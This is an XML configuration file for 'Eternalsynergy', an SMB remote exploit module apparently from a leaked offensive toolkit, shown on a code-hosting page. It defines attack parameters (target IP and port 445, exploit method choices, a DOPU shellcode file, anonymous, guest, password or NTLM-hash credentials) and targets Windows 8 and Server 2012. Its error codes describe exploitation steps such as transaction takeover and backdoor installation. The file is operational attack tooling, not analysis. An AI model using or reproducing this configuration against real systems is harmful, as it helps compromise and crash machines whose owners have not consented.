186 lines
11 KiB
XML
186 lines
11 KiB
XML
|
<?xml version='1.0' encoding='utf-8'?>
|
||
|
|
<config xmlns='urn:trch' name='Eternalsynergy' version='1.0.1' schemaversion='2.1.0' configversion='1.0.1.0' id='665a77d7870f1e8dc34048203dc820525c09bd23'>
|
||
|
|
<inputparameters>
|
||
|
|
<parameter type='S16' name='NetworkTimeout' description='Timeout for blocking network calls (in seconds). Use -1 for no timeout.'>
|
||
|
|
<default>60</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter type='IPv4' name='TargetIp' description='Target IP Address'/>
|
||
|
|
<parameter type='TcpPort' name='TargetPort' description='Target TCP port'>
|
||
|
|
<default>445</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='U32' name='MaxLeakAttempts' description='Number of tries to exploit. Default 7'>
|
||
|
|
<default>7</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='U32' name='MaxExploitAttempts' description='Number of tries to exploit. Default 3'>
|
||
|
|
<default>3</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter type='U32' name='AttemptIndex' description='How many times ETSY has already been used against this target (0-7)'>
|
||
|
|
<default>0</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter type='Boolean' name='ManyCoreTarget' description='Boolean specifying if the target is assumed to have many (8 or more) cores, physical or virtual'>
|
||
|
|
<default>0</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter type='String' name='PipeName' description='The named pipe to use'>
|
||
|
|
</parameter>
|
||
|
|
<paramchoice name='ExploitMethod' description='Which exploit method to use'>
|
||
|
|
<default>Default</default>
|
||
|
|
<paramgroup name='Default' description='Use the best exploit method(s) for the target OS'>
|
||
|
|
<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
|
||
|
|
<default>0</default>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
<paramgroup name='Matched-pairs' description='More reliable'>
|
||
|
|
<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
|
||
|
|
<default>1</default>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
<paramgroup name='Classic-Synergy' description='Less reliable'>
|
||
|
|
<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
|
||
|
|
<default>2</default>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
</paramchoice>
|
||
|
|
<parameter xdevmap='EXPLOIT_SHELLCODE' type='LocalFile' name='ShellcodeFile' description='DOPU (x64 version!) ONLY! Other shellcode will likely BSOD.'/>
|
||
|
|
<paramchoice name='Credentials' description='Type of credentials to use'>
|
||
|
|
<default>Anonymous</default>
|
||
|
|
<paramgroup name='Anonymous' description='Anonymous (NULL session)'>
|
||
|
|
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||
|
|
<default>0</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='Buffer' name='Username' description=''>
|
||
|
|
<default/>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='Buffer' name='Password' description=''>
|
||
|
|
<default/>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
<paramgroup name='Guest' description='Guest account'>
|
||
|
|
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||
|
|
<default>2</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='Buffer' name='Username' description=''>
|
||
|
|
<default>Guest</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='Buffer' name='Password' description=''>
|
||
|
|
<default/>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
<paramgroup name='Blank' description='User account with no password set'>
|
||
|
|
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||
|
|
<default>2</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
|
||
|
|
<parameter hidden='true' type='Buffer' name='Password' description=''>
|
||
|
|
<default/>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
<paramgroup name='Password' description='User name and password'>
|
||
|
|
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||
|
|
<default>3</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
|
||
|
|
<parameter type='Buffer' name='Password' description='Password entered as hex bytes (in unicode)'/>
|
||
|
|
</paramgroup>
|
||
|
|
<paramgroup name='NTLM' description='User name and NT and/or LM hash'>
|
||
|
|
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||
|
|
<default>4</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
|
||
|
|
<parameter type='Buffer' name='ntHash' description='NT password hash (in hex), or blank to use LM hash'>
|
||
|
|
<default/>
|
||
|
|
</parameter>
|
||
|
|
<parameter type='Buffer' name='lmHash' description='LM password hash (in hex), or blank to use NT hash'>
|
||
|
|
<default/>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
</paramchoice>
|
||
|
|
<paramchoice name='Protocol' description='SMB (default port 445) or NBT (default port 139)'>
|
||
|
|
<default>SMB</default>
|
||
|
|
<paramgroup name='SMB' description=''>
|
||
|
|
<parameter hidden='true' type='Boolean' name='UsingNbt' description='Boolean stating to use Nbt or not'>
|
||
|
|
<default>0</default>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
<paramgroup name='NBT' description=''>
|
||
|
|
<parameter hidden='true' type='Boolean' name='UsingNbt' description='Boolean stating to use Nbt or not'>
|
||
|
|
<default>1</default>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
</paramchoice>
|
||
|
|
<paramchoice name='Target' description='Operating System, Service Pack, of target OS'>
|
||
|
|
<paramgroup name='WIN8_SP0' description='Windows 8 Sp0, 64-bit'>
|
||
|
|
<parameter hidden='true' type='U8' name='OsMajor' description='OS Major Version'>
|
||
|
|
<default>6</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='U8' name='OsMinor' description='OS Minor Version'>
|
||
|
|
<default>2</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='U8' name='OsServicePack' description='OS Service Pack Level'>
|
||
|
|
<default>0</default>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
<paramgroup name='SERVER_2K12_SP0' description='Windows Server 2012 Sp0, 64-bit'>
|
||
|
|
<parameter hidden='true' type='U8' name='OsMajor' description='OS Major Version'>
|
||
|
|
<default>6</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='U8' name='OsMinor' description='OS Minor Version'>
|
||
|
|
<default>2</default>
|
||
|
|
</parameter>
|
||
|
|
<parameter hidden='true' type='U8' name='OsServicePack' description='OS Service Pack Level'>
|
||
|
|
<default>0</default>
|
||
|
|
</parameter>
|
||
|
|
</paramgroup>
|
||
|
|
</paramchoice>
|
||
|
|
</inputparameters>
|
||
|
|
<outputparameters>
|
||
|
|
<parameter type='Buffer' name='TargetOsArchitecture' description='The architecture of the target operating system'/>
|
||
|
|
</outputparameters>
|
||
|
|
<errors>
|
||
|
|
<errorcode name='ETSY_ERROR_NO_MEMORY' value='65' description='Out of memory'/>
|
||
|
|
<errorcode name='ETSY_ERROR_INVALID_PIPE_CHOICE' value='66' description='Named pipe choice not supported'/>
|
||
|
|
<errorcode name='ETSY_UNALIGNED_RPC_STRUCT' value='67' description='Unaligned data attempted to be sent over browser pipe'/>
|
||
|
|
<errorcode name='ETSY_ERROR_PIPES_NOT_AVAILABLE' value='68' description='No pipes available to connect to'/>
|
||
|
|
<errorcode name='ETSY_ERROR_WINSOCK_STARTUP' value='69' description='Winsock failed to start up'/>
|
||
|
|
<errorcode name='ETSY_ERROR_PARAM_INIT' value='69' description='Error during parameter initialization'/>
|
||
|
|
<errorcode name='ETSY_ERROR_TRANS_NOT_FOUND' value='70' description='Unable to find a Transaction struct with info leak'/>
|
||
|
|
<errorcode name='ETSY_ERROR_TRANS_WRITE_OUT_OF_RANGE' value='71' description='Cannot write that far into Transaction, should have written more with WriteAndX'/>
|
||
|
|
<errorcode name='ETSY_ERROR_TRANS_TAKEOVER_UNSUCCESSFUL' value='72' description='Memory written to was not a transaction we controlled'/>
|
||
|
|
<errorcode name='ETSY_ERROR_OUT_OF_REMOTE_MEMORY' value='73' description='Out of memory to use in remote transaction'/>
|
||
|
|
<errorcode name='ETSY_ERROR_UNKNOWN_TRANS_SIZE' value='74' description='Unknown transaction size detected'/>
|
||
|
|
<errorcode name='ETSY_ERROR_NOT_ENOUGH_LEAK_DATA' value='75' description='Leak returned with less data than it should have'/>
|
||
|
|
<errorcode name='ETSY_ERROR_STRUCT_WALK_ABORTED' value='76' description='Failed to walk structures and find Srv module'/>
|
||
|
|
<errorcode name='ETSY_ERROR_BACKDOOR_NOT_PRESENT' value='77' description='Backdoor transaction sent but backdoor did not respond'/>
|
||
|
|
<errorcode name='ETSY_ERROR_PAYLOAD_TOO_LARGE' value='78' description='Stage 1 payload exceeded max allowed size (0xFFFF)'/>
|
||
|
|
<errorcode name='ETSY_ERROR_BACKDOOR_RETURNED_ERROR' value='79' description='Backdoor present but returned an error code'/>
|
||
|
|
<errorcode name='ETSY_ERROR_BLUE_SCREENED_TARGET' value='80' description='Overwrite caused the target to blue screen'/>
|
||
|
|
<errorcode name='ETSY_ERROR_OS_NOT_SUPPORTED' value='81' description='Offsets not available for the targeted OS'/>
|
||
|
|
<errorcode name='ETSY_ERROR_DISPATCH_TABLE_NOT_FOUND' value='82' description='Unable to locate the dispatch table in memory'/>
|
||
|
|
<errorcode name='ETSY_ERROR_EXPLOITATION_UNSUCCESSFUL' value='83' description='Exploit methods were tried and were not successful'/>
|
||
|
|
<errorcode name='ETSY_ERROR_EXPLOIT_METHOD_UNSUCCESSFUL' value='84' description='Exploit method was not successful but did not crash, other methods may be tried'/>
|
||
|
|
<errorcode name='ETSY_ERROR_INVALID_EXPLOIT_METHOD' value='85' description='Exploit method not possible for target OS'/>
|
||
|
|
<errorcode name='ETSY_ERROR_TIPPYBEER' value='86' description='Tippybeer encountered an unrecoverable error, probably memory related'/>
|
||
|
|
<errorcode name='ETSY_ERROR_CONNECTION_LOCAL' value='87' description='Something went wrong at the network layer on our end!'/>
|
||
|
|
<errorcode name='ETSY_ERROR_CONNECTION_REMOTE' value='88' description='Connection to target failed'/>
|
||
|
|
<errorcode name='ETSY_ERROR_ARCH' value='89' description='Architecture is unknown or not supported'/>
|
||
|
|
</errors>
|
||
|
|
<redirection>
|
||
|
|
<local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='true' destaddr='TargetIp' destport='TargetPort'/>
|
||
|
|
</redirection>
|
||
|
|
<logic>
|
||
|
|
<and>
|
||
|
|
<service name='smb'>
|
||
|
|
<bindtovalue name='Protocol' value='SMB'/>
|
||
|
|
<bindtopath path="//service[name='smb']/port" name='TargetPort'/>
|
||
|
|
</service>
|
||
|
|
<or>
|
||
|
|
<os servicepack='0' name='Windows 8' family='windows' architecture='x64 64-bit'>
|
||
|
|
<bindtovalue name='Target' value='WIN8_SP0'/>
|
||
|
|
</os>
|
||
|
|
<os servicepack='0' name='Windows Server 2012' family='windows' architecture='x64 64-bit'>
|
||
|
|
<bindtovalue name='Target' value='SERVER_2K12_SP0'/>
|
||
|
|
</os>
|
||
|
|
</or>
|
||
|
|
</and>
|
||
|
|
</logic>
|
||
|
|
</config>
|